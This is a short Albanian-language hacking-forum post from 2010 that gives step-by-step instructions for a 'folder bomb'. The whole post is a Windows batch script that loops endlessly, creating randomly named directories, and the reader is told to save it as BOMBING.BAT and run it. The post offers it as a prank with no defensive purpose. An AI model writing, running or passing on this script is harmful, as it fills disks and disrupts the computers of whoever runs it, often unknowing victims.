Beni FOLDER BOMB

  Share
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Beni FOLDER BOMB

  Mesazh nga h0Ax b00ter prej Tue Jan 26, 2010 3:58 pm

  Beni FOLDER BOMB

  hapim notepad e fusim kete kodin

  Cito:

  @echo off
  color 0C
  :a
  md %random%
  goto :a
  dhe e ruajme BOMBING.BAT

  Edhe shikojeni...Shpresoj t;ju pelqeje Razz:P

   Ora është Sun Dec 16, 2018 7:05 pm